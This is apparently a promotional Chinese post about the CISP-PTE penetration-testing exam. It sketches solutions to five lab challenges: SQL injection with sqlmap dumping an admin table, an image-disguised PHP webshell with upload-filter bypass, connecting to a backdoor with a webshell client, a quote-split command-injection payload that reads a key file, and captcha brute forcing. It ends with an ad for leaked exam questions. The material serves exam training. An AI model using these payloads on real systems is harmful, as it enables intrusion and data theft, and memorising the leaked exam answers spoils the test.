CISP-PTE从2017年开始由奇安信设立，到现在已经有4年的时间了，CISP-PTE有啥题，有什么类型的题呢?如果您有真题（完整版）方面的需求，扫文章底部二维码哦，因为版本有限下面为其中之3

　　第一题：基础题目之SQL注入

　　1.解题思路

　　先随便注册一个账号，用这个账号登陆，在发表界面发布内容并抓包，把这个包保存到sql.txt里边，用sqlmap去注入

　　sqlmap.py -r 1.txt --dump -C "user,pass" -T "admin" -D "test"

　　第二题：基础题目之文件上传突破

　　解题思路copy 1.jpg/a+2.php/b #制作一句话图片马

　　上传抓包，修改文件后缀为phtml,pHp等

　　上传成功一句话之后，执行命令获取根目录下的key.php

　　第三题：基础题目之文件包含

　　由url可知包含的是view.html，通过浏览器直接访问该文件查看源码可知此页面是包含一句话后门的文件，可直接通过菜刀连接得用Cknife.jar版本的菜刀修改config.ini文件为：ACTION=z0PHP_MAKE=连接 xxx.com/vulnerabilities/fu1.php?file=view.html密码 Hello=0

       第四题：基础题目之命令执行

　　解题思路答案 127.0.0.1 &c'a't ../key.'p'hp

       第五题：基础题目之验证码爆破

　　验证码可以被重复利用直接burpsuit抓包就暴力破解

　　如果有题型方面的相关问题，可以直接咨询赛虎客服，也可以扫描下面二维码加微信联系。